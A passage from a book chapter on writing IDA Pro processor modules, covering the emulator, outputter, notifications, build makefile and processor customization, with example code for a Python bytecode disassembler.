without descending into the operation of the Python interpreter, so we sum-

marize the analyzer here and through comments in the preceding code,

remembering that the analyzer’s job is to dissect a single instruction:

1. The analyzer gets the next instruction byte from the instruction stream

and determines whether the byte is a valid Python opcode.

2. If the instruction has no operands, cmd.Operand[0] (cmd.Op1) is initialized

to o_void.

3. If the command has an operand, cmd.Operand[0] is initialized to reflect

the type of the operand. Several processor-specific fields are used to

carry information forward to later stages in the processor module.

4. The length of the instruction is returned to the caller.

More sophisticated instruction sets are almost certain to require more

complex analyzer stages. Overall, however, any analyzer’s behavior may be

generalized as follows:

1. Read enough bytes from the instruction stream to determine whether

the instruction is valid and to map the instruction to one of the enumer-

ated instruction type constants, which is then saved in cmd.itype. This

operation is often performed using a large switch statement to categorize

instruction opcodes.

2. Read any additional bytes required to properly determine the number

of operands required by the instruction, the addressing modes in use

by those operands, and the individual components of each operand

(registers and immediate data). This data is used to populate elements

of the cmd.Operands array. This operation may be factored into a separate

operand-decoding function.

3. Return the total length of the instruction and its operands.

Strictly speaking, once an instruction has been dissected, IDA has enough

information to generate an assembly language representation of that instruc-

tion. In order to generate cross-references, facilitate the recursive descent

process, and monitor the behavior of the program stack pointer, IDA must

obtain additional details about the behavior of each instruction. This is the

job of the emulator stage of an IDA processor module.

The Emulator

Whereas the analyzer stage is concerned with the structure of a single

instruction, the emulator stage is concerned with the behavior of a single

instruction. In IDA example processor modules, the emulator is typically

implemented by a function named emu (you may name it anything you like)

IDA Processor Modules 391

in a file named emu.cpp. Like the ana function, the prototype for this function

is very simple, as shown here:

int idaapi emu(void); //emulate one instruction

According to idp.hpp, the emu function is supposed to return the length of

the instruction that was emulated; however, the majority of sample emulators

seem to return the value 1.

You must initialize the u_emu member of the LPH object with a pointer to

your emulator function. By the time emu is called, cmd has been initialized by

the analyzer. The emulator’s primary purpose is to create code and data

cross-references based on the behavior of the instruction described by cmd.

The emulator is also the place to keep track of any changes to the stack

pointer and create local variables based on observed access to a function’s

stack frame. Unlike the analyzer, the emulator may change the database.

Determining whether an instruction results in the creation of any cross-

references is typically done by examining the instruction’s canonical features

in conjunction with the type field of the instruction’s operands. A very basic

emulator function for an instruction set whose instructions may take up to

two operands, which is representative of many of the SDK examples, is shown

here:

void TouchArg(op_t &op, int isRead); //Processor author writes this

int idaapi emu() {

ulong feature = cmd.get_canon_feature(); //get the instruction's CF_xxx flags

if (feature & CF_USE1) TouchArg(cmd.Op1, 1);

if (feature & CF_USE2) TouchArg(cmd.Op2, 1);

if (feature & CF_CHG1) TouchArg(cmd.Op1, 0);

if (feature & CF_CHG2) TouchArg(cmd.Op2, 0);

if ((feature & CF_STOP) == 0) { //instruction doesn't stop

//add code cross ref to next sequential instruction

ua_add_cref(0, cmd.ea + cmd.size, fl_F);

}

return 1;

}

For each instruction operand, the preceding function examines the

instruction’s canonical features to determine whether a cross-reference of

any kind should be generated. In this example, a function named TouchArg

examines a single operand to determine what type of cross-reference should

be generated and handles the details of generating the correct cross-reference.

When generating cross-references from your emulator, you should use the

392 Chapter 19

cross-reference-creation functions declared in ua.hpp rather than in xref.hpp.

The following rough guidelines may be used in determining what type of

cross-references to generate.

zIf the operand type is o_imm, the operation is a read (isRead is true), and

the operand value is a pointer, create an offset reference. Determine

whether an operand is a pointer by calling the isOff function, for exam-

ple, isOff(uFlag, op.n). Add an offset cross-reference using

ua_add_off_drefs, for example, ua_add_off_drefs(op, dr_O);.

zIf the operand type is o_displ and the operand value is a pointer, create

an offset cross-reference with a read or write cross-reference type as

appropriate, for example, ua_add_off_drefs(op, isRead ? dr_R : dr_W);.

zIf the operand type is o_mem, add a data cross-reference with a read or

write cross-reference type as appropriate using ua_add_dref, for example,

ua_add_dref(op.offb, op.addr, isRead ? dr_R : dr_W);.

zIf the operand type is o_near, add a code cross-reference with a jump or

call cross-reference type as appropriate using ua_add_cref, for example,

ua_add_cref(op.offb, op.addr, feature & CF_CALL ? fl_CN : fl_JN);.

The emulator is also responsible for reporting on the behavior of the stack

pointer register. The emulator should use the add_auto_stkpnt2 function to

inform IDA that an instruction changed the value of the stack pointer. The

prototype for add_auto_stkpnt2 is shown here:

bool add_auto_stkpnt2(func_t *pfn, ea_t ea, sval_t delta);

The pfn pointer should point to the function that contains the address

being emulated. If pfn is NULL, it will be automatically determined by IDA.

The ea parameter should specify the end address (typically cmd.ea + cmd.size)

for the instruction that changes the stack pointer. The delta parameter is

used to specify the number of bytes by which the stack pointer grows or

shrinks. Use negative deltas when the stack is growing (such as after a push

instruction) and positive deltas when the stack is shrinking (such as after a

pop instruction). A simple 4-byte adjustment to the stack pointer in conjunc-

tion with a push operation might be emulated as follows:

if (cmd.itype == X86_push) {

add_auto_stkpnt2(NULL, cmd.ea + cmd.size, -4);

}

In order to maintain an accurate record of stack pointer behavior, the

emulator should be able to recognize and emulate all instructions that

change the stack pointer, not just the simple push and pop cases. A more

complex example of tracking the stack pointer occurs when a function

IDA Processor Modules 393

allocates its local variables by subtracting a constant value from the stack

pointer. This case is illustrated here:

//handle cases such as: sub esp, 48h

if (cmd.itype == X86_sub && cmd.Op1.type == o_reg

&& cmd.Op1.reg == r_esp && cmd.Op2.type == o_imm) {

add_auto_stkpnt2(NULL, cmd.ea + cmd.size, -cmd.Op2.value);

}

Because CPU architectures vary significantly from one CPU to another,

it is not possible for IDA (or any other program for that matter) to account

for every possible way that an operand may be formed or every way that an

instruction may reference other instructions or data. As a result, there is no

precise cookbook recipe for building your emulator module. Reading through

existing processor module source code along with a lot of trial and error may

be required before your emulator does everything you want it to do.

The emulator for our example Python processor is shown here:

int idaapi py_emu(void) {

//We can only resolve target addresses for relative jumps

if (cmd.auxpref & HAS_JREL) { //test the flags set by the analyzer

ua_add_cref(cmd.Op1.offb, cmd.Op1.addr, fl_JN);

}

//Add the sequential flow as long as CF_STOP is not set

if((cmd.get_canon_feature() & CF_STOP) == 0) {

//cmd.ea + cmd.size computes the address of the next instruction

ua_add_cref(0, cmd.ea + cmd.size, fl_F);

}

return 1;

}

Again, owing to the architecture of the Python interpreter, we are

severely limited in the types of cross-references that we can generate. In

Python byte code, there is no concept of a memory address for data items,

and the absolute address of each instruction can be determined only by

parsing metainformation contained in the compiled Python (.pyc) file. Data

items are either stored in tables and referenced by index values or they are

stored on the program stack, where they cannot be directly referenced. Here

again, while we can directly read data item index values from instruction

operands, we cannot know the structure of the tables that hold the data

unless we have parsed additional metainformation contained in the .pyc file.

In our processor, we can compute only the target of relative jump instruc-

tions and the address of the next instruction because they are located relative

to the current instruction address. The fact that our processor can provide a

better disassembly only if it has a more detailed understanding of the file

structure is a limitation that we discuss in “Processor Module Architecture”

on page 409.

For similar reasons, we have elected not to track the stack pointer’s

behavior in our Python processor. This is primarily because IDA treats stack

394 Chapter 19

pointer changes as relevant only when those changes are made within the

confines of a function and we have no means at present for recognizing func-

tion boundaries within Python code. If we were to implement stack-pointer

tracking, it would be wise to remember that, as a stack-based architecture, vir-

tually every Python instruction modifies the stack in some way. In this case, to

simplify the process of determining how much the stack pointer is changed

by each instruction, it might be easier to define an array of values, one per

Python instruction, that contains the amount by which each instruction mod-

ifies the stack. These amounts would then be used in calls to add_auto_stkpnt2

each time an instruction is emulated.

Once the emulator has added all of the cross-references that it can and

made any other modifications to the database that it deems necessary, you

are ready to start generating output. In the following section, we discuss the

role of the outputter in generating IDA’s disassembly display.

The Outputter

The purpose of the outputter is to output a single disassembled instruction,

as specified by the cmd global variable, to the IDA display. In IDA processor

modules, the outputter is typically implemented by a function named out

(you may name it anything you like) in a file named out.cpp. Like the ana and

emu functions, the prototype for this function is very simple, as shown here:

void idaapi out(void); //output a single disassembled instruction

You must initialize the u_out member of the LPH object with a pointer to

your output function. By the time out is called, cmd has been initialized by the

analyzer. Your output function should not make any changes to the database.

You are also required to create a helper function whose sole purpose is to

format and output a single instruction operand. This function is typically

named outop and is pointed to by the u_outop member of LPH. Your out func-

tion should not call outop directly. Instead, you should call out_one_operand

each time you need to print an operand portion of your disassembly lines.

Data output operations are handled by a separate function typically named

cpu_data and specified by the d_out member field of the LPH object. In our

Python processor, this function is named python_data.

Output lines in a disassembly listing are composed of several compo-

nents, such as a prefix, a name label, a mnemonic, operands, and possibly a

comment. The IDA kernel retains responsibility for rendering some of these

components (such as prefixes, comments, and cross-references), while oth-

ers are the responsibility of the processor’s outputter. Several useful func-

tions for generating pieces of an output line are declared in ua.hpp under

the following heading:

//--------------------------------------------------------------------------

// I D P H E L P E R F U N C T I O N S - O U T P U T

//--------------------------------------------------------------------------

IDA Processor Modules 395

Colorizing portions of each output line is possible through the use of

functions that insert special color tags into your output buffers. Additional

functions for generating output lines may be found in lines.hpp.

Rather than use a console-style output model in which you write content

directly to the IDA display, IDA utilizes a buffer-based output scheme in which

you must write a single line of display text into a character buffer and then

ask IDA to display your buffer. The basic process for generating an output

line follows:

1. Call init_output_buffer(char *buf, size_t bufsize) (declared in ua.hpp) to

initialize your output buffer.

2. Utilize the buffer output functions in ua.hpp to generate a single line of

content by adding to the initialized buffer. Most of these functions auto-

matically write to the destination buffer specified in the previous step,

so there is often no need to explicitly pass a buffer into these functions.

These functions are typically named out_xxx or OutXxx.

3. Call term_output_buffer() to finalize your output buffer, making it ready

to send to the IDA kernel for display.

4. Send the output buffer to the kernel using either MakeLine or printf_line

(both declared in lines.hpp).

Note that init_output_buffer, term_output_buffer, and MakeLine are usually

called only within your out function. Your outop function typically makes use

of the current output buffer as initialized by out and usually has no need to

initialize its own output buffers.

Strictly speaking, you can skip all of the buffer manipulation described

in the first four steps of the preceding list and go straight to calling MakeLine

as long as you don’t mind taking complete control of the buffer-generation

process and passing up the convenience functions offered in ua.hpp. In addi-

tion to assuming a default destination for generated output (as specified via

init_out_buffer), many of the convenience functions automatically work with

the current contents of the cmd variable. Some of the more useful convenience

functions from ua.hpp are described here:

OutMnem(int width, char *suffix)

Outputs the mnemonic that corresponds to cmd.itype in a field of at least

width characters, appending the specified suffix. At least one space is

printed after the mnemonic. The default width is 8, and the default suf-

fix is NULL. An example of the use of the suffix value might be for oper-

and size modifiers, as in the following x86 mnemonics: movsb, movsw, movsd.

out_one_operand(int n)

Invokes your processor’s outop function to print cmd.Operands[n].

out_snprintf(const char *format, ...)

Appends formatted text to the current output buffer.

396 Chapter 19

OutValue(op_t &op, int outflags)

Outputs constant fields of an operand. This function outputs op.value or

op.addr, depending on the value of outflags. See ua.hpp for the meaning

of outflags, which defaults to 0. This function is meant to be called from

within outop.

out_symbol(char c)

Outputs the given character using the current color for punctuation

(COLOR_SYMBOL as defined in lines.hpp). This function is primarily used

for outputting the syntactic elements within operands (thus called from

outop), such as commas and brackets.

out_line(char *str, color_t color)

Appends the given string, in the given color, to the current output

buffer. Colors are defined in lines.hpp. Note that this function does not

output a line at all. A better name for this function might be out_str.

OutLine(char *str)

Same as out_line but without the use of color.

out_register(char *str)

Outputs the given string using the current color for registers (COLOR_REG).

out_tagon(color_t tag)

Inserts a turn color on tag into the output buffer. Subsequent output to

the buffer will be displayed in the given color until a turn color off tag is

encountered.

out_tagoff(color_t tag)

Inserts a turn color off tag into the output buffer.

Please refer to ua.hpp for additional output functions that may be of use

in building your outputter.

One output capability that is missing from ua.hpp is the ability to easily

output a register name. During the analysis phase, register numbers are

stored into an operand’s reg or phrase field, depending on the addressing

mode used for that operand. Since many operands make use of registers, it

would be nice to have a function that quickly outputs a register string given

a register number. The following function provides a minimal capability to

do so:

//with the following we can do things like: OutReg(op.reg);

void OutReg(int regnum) {

out_register(ph.regNames[regnum]); //use regnum to index register names array

}

IDA calls your out function only as needed, when an address comes into

view in one of the IDA displays or when portions of a line are reformatted.

Each time out is called, it is expected to output as many lines as are necessary

to represent the instruction described in the cmd global variable. In order to

do this, out will generally make one or more calls to MakeLine (or printf_line).

In most cases one line (and hence one call to MakeLine) will be sufficient.

IDA Processor Modules 397

When more than one line is required to describe an instruction, you should

never add carriage returns to your output buffers in an attempt to generate

several lines at once. Instead, you should make multiple calls to MakeLine to

output each individual line. The prototype for MakeLine is shown here:

bool MakeLine(const char *contents, int indent = -1);

An indent value of –1 requests default indentation, which is the current

value of inf.indent as specified in the Disassembly section of the Options

General dialog. The indent parameter has additional meaning when an

instruction (or data) spans several lines in the disassembly. In a multiline

instruction, an indent of –1 designates a line as the most important line for

that instruction. Please refer to the comments for the printf_line function

in lines.hpp for more information on using indent in this manner.

Up to this point, we have avoided discussion of comments. Like names

and cross-references, comments are handled by the IDA kernel. However,

you are afforded some control over which line of a multiline instruction the

comment is displayed on. The display of comments is controlled to some

extent by a global variable named gl_comm, which is declared in lines.hpp. The

most important thing to understand about gl_comm is that comments cannot

be displayed at all unless gl_comm is set to 1. If gl_comm is 0, then a comment

will not be displayed at the end of the output you have generated, even if the

user has entered one and comments are enabled in the OptionsGeneral

settings. The trouble is, gl_comm defaults to 0, so you need to make sure that

you set it to 1 at some point if you ever expect users to see comments while

using your processor module. When your out function generates multiple

lines, you need to control gl_comm if you want any user-entered comments to

be displayed on anything other than your first line of output.

With the highlights of building an outputter under our belts, here is the

out function for our example Python processor:

void py_out(void) {

char str[MAXSTR]; //MAXSTR is an IDA define from pro.h

init_output_buffer(str, sizeof(str));

OutMnem(12); //first we output the mnemonic

if(cmd.Op1.type != o_void) { //then there is an argument to print

out_one_operand(0);

}

term_output_buffer();

gl_comm = 1; //we want comments!

MakeLine(str); //output the line with default indentation

}

The function works its way through the components of a disassembled

line in a very simple fashion. If Python instructions could take two operands,

we might use out_symbol to output a comma and then call out_one_operand a

second time to output the second operand. In most cases, your outop func-

tion will be somewhat more complex than your out function, as the structure

of an operand is generally more complex than the high-level structure of an

398 Chapter 19

instruction. A typical approach for implementing the outop function is to use

a switch statement to test the value of the operand’s type field and format the

operand accordingly.

In our Python example, we are forced to use a very simple outop function,

because in most cases we lack the information required to translate the inte-

ger operands into anything more intelligible. Our implementation is shown

here, with special handling for comparisons and relative jumps only:

char *compare_ops[] = {

"<", "<=", "==", "!=", ">", ">=",

"in", "not in", "is", "is not", "exception match"

};

bool idaapi py_outop(op_t& x) {

if (cmd.itype == COMPARE_OP) {

//For comparisons, the argument indicates the type of comparison to be

//performed. Print a symbolic representation of the comparison rather

//than a number.

if (x.value < qnumber(compare_ops)) {

OutLine(compare_ops[x.value]);

}

else {

OutLine("BAD OPERAND");

}

else if (cmd.auxpref & HAS_JREL) {

//we don't test for x.type == o_near here because we need to distinguish

//between relative jumps and absolute jumps. In our case, HAS_JREL

//implies o_near

out_name_expr(x, x.addr, x.addr);

}

else { //otherwise just print the operand value

OutValue(x);

}

return true;

}

In addition to disassembled instructions, a disassembly listing usually

contains bytes that should be represented as data. In the output stage, data

display is handled by the d_out member of the LPH object. The kernel calls the

d_out function to display any bytes that are not part of an instruction, whether

the datatype of those bytes is unknown or whether the bytes have been format-

ted as data by the user or the emulator. The prototype for d_out is shown here:

void idaapi d_out(ea_t ea); //format data at the specified address

The d_out function should examine the flags associated with the address

specified by the ea parameter and generate an appropriate representation of

the data in the style of the assembly language being generated. This function

must be specified for all processor modules. A bare-bones implementation is

offered by the SDK in the form of the intel_data function, but it is unlikely to

IDA Processor Modules 399

meet your specific needs. In our Python example, we actually have very little

need to format static data because we don’t have the means to locate it. For

the sake of example, we make use of the function shown here:

void idaapi python_data(ea_t ea) {

char obuf[256];

init_output_buffer(obuf, sizeof(obuf));

flags_t flags = get_flags_novalue(ea); //get the flags for address ea

if (isWord(flags)) { //output a word declaration

out_snprintf("%s %xh", ash.a_word ? ash.a_word : "", get_word(ea));

}

else if (isDwrd(flags)) { //output a dword declaration

out_snprintf("%s %xh", ash.a_dword ? ash.a_dword : "", get_long(ea));

}

else { //we default to byte declarations in all other cases

int val = get_byte(ea);

char ch = ' ';

if (val >= 0x20 && val <= 0x7E) {

ch = val;

}

out_snprintf("%s %02xh ; %c", ash.a_byte ? ash.a_byte : "", val, ch);

}

term_output_buffer();

gl_comm = 1;

MakeLine(obuf);

}

Functions for accessing and testing the flags associated with any address

in the database are available in bytes.hpp. In this example, the flags are tested

to determine whether the address represents word or dword data, and appro-

priate output is generated using the appropriate data declaration keyword

from the current assembler module. The global variable ash is an instance of

an asm_t struct that describes characteristics of the assembler syntax that is

being utilized in the disassembly. We would need significantly more logic in

order to generate more complex data displays, such as arrays.

Processor Notifications

In Chapter 17, we discussed the ability of plug-ins to hook various notification

messages using the hook_to_notification_point function. By hooking notifica-

tions, plug-ins could be informed of various actions taking place within the

database. The concept of notification messages exists for processor modules

as well, but processor notifications are implemented in a slightly different

manner than plug-in notifications.

All processor modules should set a pointer to a notification function in

the LPH object’s notify field. The prototype for notify is shown here:

int idaapi notify(idp_notify msgid, ...); //notify processor with a given msg

400 Chapter 19

The notify function is a variable-arguments function that receives a noti-

fication code and a variable list of arguments specific to that notification code.

The complete list of available processor notification codes may be found in

idp.hpp. Notification messages exist for simple actions such as loading (init)

and unloading (term) the processor to more complex notifications that code

or data is being created, functions are being added or deleted, or segments

are being added or deleted. The list of parameters supplied with each notifi-

cation code is also specified in idp.hpp. Before looking at an example of a

notify function, it is worth noting the following comments found only in

some of the SDK’s sample processor modules:

// A well-behaving processor module should call invoke_callbacks()

// in its notify() function. If invoke_callbacks function returns 0,

// then the processor module should process the notification itself.

// Otherwise the code should be returned to the caller.

In order to ensure that all modules that have hooked processor notifica-

tions are properly notified, the invoke_callbacks function should be called.

This causes the kernel to propagate the given notification message to all

registered callbacks. The notify function used in our Python processor is

shown here:

static int idaapi notify(processor_t::idp_notify msgid, ...) {

va_list va;

va_start(va, msgid); //setup args list

int result = invoke_callbacks(HT_IDP, msgid, va);

if (result == 0) {

result = 1; //default success

switch(msgid) {

case processor_t::init:

inf.mf = 0; //ensure little endian!

break;

case processor_t::make_data: {

ea_t ea = va_arg(va, ea_t);

flags_t flags = va_arg(va, flags_t);

tid_t tid = va_arg(va, tid_t);

asize_t len = va_arg(va, asize_t);

if (len > 4) { //our d_out can only handle byte, word, dword

result = 0; //disallow big data

}

break;

}

va_end(va);

return result;

}

This notify function handles only two notification codes: init and

make_data. The init notification is handled in order to explicitly force the

kernel to treat data as little-endian. The inf.mf (most first) flag indicates the

IDA Processor Modules 401

endianness value in use by the kernel (0 for little and 1 for big). The

make_data notification is sent whenever an attempt is made to convert bytes

to data. In our case, the d_out function is capable of dealing with only byte,

word, and dword data, so the function tests the size of the data being created

and disallows anything larger than 4 bytes.

Other processor_t Members

In order to wind up the discussion on creating processor modules, we need

to at least touch on several additional fields in the LPH object. As mentioned

previously, there are a tremendous number of function pointers within this

structure. If you read through the definition of the processor_t struct in

idp.hpp, it is clear in some cases that you can safely set some function pointers

to NULL, and the kernel will not call them. It seems reasonable to assume

that you are required to provide implementations for all of the other func-

tions required by processor_t. As a general rule of thumb, you can often get

away with an empty stub function when you are at a loss as to what you should

do. In our Python processor, where it was not clear that NULL was a valid

value, we initialized function pointers as follows (refer to idp.hpp for the

behavior of each function):

header Points to empty function in example.

footer Points to empty function in example.

segstart Points to empty function in example.

segend Points to empty function in example.

is_far_jump Is set to NULL in example.

translate Is set to NULL in example.

realcvt Points to ieee_realcvt from ieee.h.

is_switch Is set to NULL in example.

extract_address Points to a function that returns (BADADDR–1) in

example.

is_sp_based Is set to NULL in example.

create_func_frame Is set to NULL in example.

get_frame_retsize Is set to NULL in example.

u_outspec Is set to NULL in example.

set_idp_options Is set to NULL in example.

In addition to these function pointers, the following three data members

are worth mentioning:

shnames A NULL-terminated array of character pointers that point to

short names (fewer than nine characters) associated with the processor

(such as python). Terminate this array with a NULL pointer.

402 Chapter 19

lnames A NULL-terminated array of character pointers that point to

long names associated with the processor (such as Python 2.4 byte code).

This array should contain the same number of elements as the shnames

array.

asms NULL-terminated array of pointers to target assembler (asm_t)

structs.

The shnames and lnames arrays specify the names of all processor types that

can be handled by the current processor module. Users may select alternate

processors on the Analysis tab of the OptionsGeneral dialog, as shown in

Figure 19-1.

Processor modules that support multiple processors should process the

processor_t.newprc notification in order to be informed of processor changes.

Figure 19-1: Selecting alternate processors and assemblers

The asm_t structure is used to describe some of the syntactic elements of

an assembly language, such as the format of hexadecimal numbers, strings,

and character delimiters, as well as various keywords commonly used in

assembly languages. The intent of the asms field is to allow several different

styles of assembly language to be generated by a single processor module.

Processor modules that support multiple assemblers should process the

processor_t.newasm notification in order to be notified of processor changes.

Ultimately, the completed version of our simple Python processor is

capable of generating code such as the following:

ROM:00156 LOAD_CONST 12

ROM:00159 COMPARE_OP ==

ROM:00162 JUMP_IF_FALSE loc_182

ROM:00165 POP_TOP

IDA Processor Modules 403

ROM:00166 LOAD_NAME 4

ROM:00169 LOAD_ATTR 10

ROM:00172 LOAD_NAME 5

ROM:00175 CALL_FUNCTION 1

ROM:00178 POP_TOP

ROM:00179 JUMP_FORWARD loc_183

ROM:00182 # ----------------------------------------------------------

ROM:00182 loc_182: # CODE XREF: ROM:00162j

ROM:00182 POP_TOP

ROM:00183

ROM:00183 loc_183: # CODE XREF: ROM:00179j

ROM:00183 LOAD_CONST 0

ROM:00186 RETURN_VALUE

While it is possible to generate Python disassemblies that reveal far more

information than this, they require far greater knowledge of the .pyc file for-

mat than was assumed for this example. A somewhat more fully featured

Python processor module is available on the book’s website.

Building Processor Modules

The process for building and installing an IDA processor module is very sim-

ilar to the process for building plug-ins and loaders, with one major differ-

ence that, if not followed, can result in the inability of IDA to utilize your

processor. Some minor differences in the build process include these:

1. File extensions for processors are .w32/.w64 on Windows, .ilx/ilx64 on

Linux, and .imc/.imc64 on OS X platforms.

2. The build scripts for the SDK’s example processors (as well as our own)

store newly created processor binaries into <SDKDIR>/bin/procs.

3. Processor modules are installed by copying the compiled processor

binary to <IDADIR>/procs.

4. Windows processor modules are required to use a customized MS-DOS

stub4 supplied with the SDK.

5. Windows-based processor modules require a custom postprocessing step

not required by plug-ins and loaders. The purpose of this step is to insert

a processor description string into a specific location in the compiled

processor binary. The description string is displayed in the processor

drop-down list portion of IDA’s load-file dialog.

When you build a Windows-based processor module, you are expected

to utilize a custom MS-DOS stub supplied with the SDK (<SDKDIR>/module/

stub). In order to use a custom MS-DOS stub, you must instruct your linker to

use your stub rather than the default stub it would otherwise include. When

using Windows-specific compilers, it is occasionally possible to specify alter-

nate stubs through the use of module definition (.def ) files. Borland build

4. An MS-DOS header stub includes an MS-DOS file header as well as code to warn users that a

Windows program cannot be executed in MS-DOS mode.

404 Chapter 19

tools (used by Hex-Rays) support the specification of alternate stubs using

.def files. The SDK includes <SDKDIR>/module/idp.def for your use if you hap-

pen to be using Borland tools. The GNU and Microsoft linkers both support

.def files (albeit with a slightly different syntax); however, neither supports

the specification of alternate MS-DOS stubs, which clearly poses a problem if

you are using one of these compilers.

Assuming for a moment that you do manage to build your processor

module with the SDK-supplied custom MS-DOS stub, you must still insert

the processor description comment into the processor binary. This is the

purpose of the <SDKDIR>/bin/mkidp.exe utility. You may add a description

to a processor using the following syntax to invoke mkidp:

$ mkidp module description

Here, module is the path to your processor module, while description is a

textual description of your module in the following form:

Long module name:short module name

To add a description to our Python processor module, we might use the

following command line:

$ ./mkidp procs/python.w32 "Python Bytecode:python"

The mkidp utility attempts to insert the supplied description into the

named module at an offset of 128 bytes into the file, in space that lies between

the MS-DOS stub and the PE header, assuming such space exists. If there is

not enough space because the PE header is too close to the end of the MS-

DOS stub, you will receive the following error message:

mkidp: too long processor description

Things become more dependent on your tools at this point, because pro-

cessors built with the Microsoft linker will have enough space available to

insert a description, while processors built using the GNU linker will not.

In order to clear up the confusion in our minds and allow us to use

either Microsoft or GNU tools, we developed a utility that we call fix_proc,

which is available in the Chapter 19 section of the book’s website. The

fix_proc utility uses the same command-line syntax as mkidp, but it provides

additional behavior that allows it to insert a processor description into pro-

cessor modules built with most compilers. When fix_proc is executed, it

replaces a processor’s existing MS-DOS stub with the stub supplied with the

SDK (thus eliminating the need to use .def files in the build process). At the

same time, fix_proc performs the necessary actions to relocate the proces-

sor’s PE headers to create sufficient space to hold the processor-description

string, before ultimately inserting the description string into the proper loca-

tion within the processor binary. We use fix_proc as a replacement for mkidp

in performing the required postprocessing steps on processor modules.

IDA Processor Modules 405

NOTE Strictly speaking, use of the SDK’s MS-DOS stub for processor modules is not required.

IDA is happy with a processor module as long as it finds a description string 128 bytes

into the processor module. In fix_proc, we replace the existing MS-DOS stub with the

SDK stub simply to avoid any possible conflicts over the space dedicated to the descrip-

tion string.

Table 19-1 describes the features of processors based on the tools used to

build them.

Only processors that have valid descriptions will be listed in the file-

loading dialog. In other words, without a valid description field, it is not

possible to select a processor module.

All of these differences in the build process require a few more modifica-

tions to the makefile presented in Listing 17-1 than were required to build

loader modules. Listing 19-1 shows a makefile modified to build our example

Python processor.

#Set this variable to point to your SDK directory

IDA_SDK=../../

PLATFORM=$(shell uname | cut -f 1 -d _)

ifneq "$(PLATFORM)" "MINGW32"

IDA=$(HOME)/ida

endif

#Set this variable to the desired name of your compiled processor

PROC=python

#Specify a description string for your processor, this is required

#The syntax is <long name>:<short name>

XDESCRIPTION=Python Bytecode:python

ifeq "$(PLATFORM)" "MINGW32"

PLATFORM_CFLAGS=-D__NT__ -D__IDP__ -DWIN32 -Os -fno-rtti

PLATFORM_LDFLAGS=-shared -s

LIBDIR=$(shell find ../../ -type d | grep -E "(lib|lib/)gcc.w32")

ifeq ($(strip $(LIBDIR)),)

LIBDIR=../../lib/x86_win_gcc_32

endif

IDALIB=$(LIBDIR)/ida.a

PROC_EXT=.w32

Table 19-1:

Postprocessing IDA Processor Modules (by Compiler)

Initial Build After mkidp After fix_proc

Tool Uses

.def? Has

stub? Has

Description? Has

stub? Has

Description?

Borland Yes Yes Yes Yes Yes Yes

MicrosoftNoNoNoYes YesYes

GNU NoNoNoNo YesYes

406 Chapter 19

else ifeq "$(PLATFORM)" "Linux"

PLATFORM_CFLAGS=-D__LINUX__

PLATFORM_LDFLAGS=-shared -s

IDALIB=-lida

IDADIR=-L$(IDA)

PROC_EXT=.ilx

else ifeq "$(PLATFORM)" "Darwin"

PLATFORM_CFLAGS=-D__MAC__

PLATFORM_LDFLAGS=-dynamiclib

IDALIB=-lida

IDADIR=-L$(IDA)/idaq.app/Contents/MacOs

PROC_EXT=.imc

endif

#Platform specific compiler flags

CFLAGS=-Wextra $(PLATFORM_CFLAGS)

#Platform specific ld flags

LDFLAGS=$(PLATFORM_LDFLAGS)

#specify any additional libraries that you may need

EXTRALIBS=

# Destination directory for compiled plugins

OUTDIR=$(IDA_SDK)bin/procs/

# Postprocessing tool to add processor comment

YMKIDP=$(IDA_SDK)bin/fix_proc

#MKIDP=$(IDA)bin/mkidp

#list out the object files in your project here

OBJS=ana.o emu.o ins.o out.o reg.o

BINARY=$(OUTDIR)$(PROC)$(PROC_EXT)

all: $(OUTDIR) $(BINARY)

clean:

-@rm *.o

-@rm $(BINARY)

$(OUTDIR):

-@mkdir -p $(OUTDIR)

CC=g++

INC=-I$(IDA_SDK)include/

%.o: %.cpp

$(CC) -c $(CFLAGS) $(INC) $< -o $@

LD=g++

IDA Processor Modules 407

ifeq "$(PLATFORM)" "MINGW32"

#Windows processor's require post processing

$(BINARY): $(OBJS)

$(LD) $(LDFLAGS) -o $@ $(OBJS) $(IDALIB) $(EXTRALIBS)

Z$(MKIDP) $(BINARY) "$(DESCRIPTION)"

else

$(BINARY): $(OBJS)

$(LD) $(LDFLAGS) -o $@ $(OBJS) $(IDALIB) $(EXTRALIBS)

endif

#change python below to the name of your processor, make sure to add any

#additional files that your processor is dependent on

python.o: python.cpp

ana.o: ana.cpp

emu.o: emu.cpp

ins.o: ins.cpp

out.o: out.cpp

reg.o: reg.cpp

Listing 19-1: A makefile for the Python processor module

In addition to the minor changes to account for different suffixes and

default file locations for processors, the primary differences are the defini-

tion of a description string X, the specification of a utility to insert descrip-

tion strings Y, and the addition of a build step to insert the description

string in Windows processor modules Z.

Customizing Existing Processors

Perhaps you are considering developing a processor module, but you notice

that an existing processor module does almost everything that you need. If

you have the source code for the processor module, then you might easily

modify it to suit your needs. On the other hand, if you don’t have the source

code, you might feel that you are out of luck. Fortunately, IDA offers a mech-

anism for customizing existing processors through the use of plug-ins. By

hooking the appropriate processor notifications, a plug-in module can inter-

cept calls to one or more of an existing processor’s analyzer, emulator, and

outputter stages. Potential applications for customizing a processor include

the following:

zExtending the capabilities of an existing processor to recognize addi-

tional instructions

zCorrecting broken behavior in an existing processor module (though it

is probably faster just to let Ilfak know you found a bug)

zCustomizing the output of an existing processor module to suit your par-

ticular needs

408 Chapter 19

The following notification codes, declared in processor_t and discussed

in idp.hpp, may be hooked by plug-ins that want to intercept calls to various

stages of a processor:

custom_ana Behaves as u_ana; however, any new instructions must use a

cmd.itype value of 0x8000 or higher.

custom_emu Provides emulation for custom instruction types. You may

call (*ph.u_emu)() if you wish to invoke the processor’s existing emulator.

custom_out Generates output for custom instructions or provides cus-

tom output for existing instructions. You may call (*ph.u_out)() if you

wish to invoke the processor’s out function.

custom_outop Outputs a single custom operand. You may call

(*ph.u_outop)(op) if you wish to invoke the processor’s existing outop func-

tion.

custom_mnem Generates the mnemonic for a custom instruction.

The following code excerpts are from a plug-in that modifies the output

of the x86 processor module to replace the leave instruction with a cya

instruction and to swap the display order for instructions that have two oper-

ands (similar to the AT&T-style syntax):

int idaapi init(void) {

X if (ph.id != PLFM_386) return PLUGIN_SKIP;

Y hook_to_notification_point(HT_IDP, hook, NULL);

return PLUGIN_KEEP;

}

int idaapi hook(void *user_data, int notification_code, va_list va) {

switch (notification_code) {

case processor_t::custom_out: {

Z if (cmd.itype == NN_leave) { //intercept the leave instruction

[ MakeLine(SCOLOR_ON SCOLOR_INSN "cya" SCOLOR_OFF);

return 2;

}

else if (cmd.Op2.type != o_void) {

//intercept 2 operand instructions

op_t op1 = cmd.Op1;

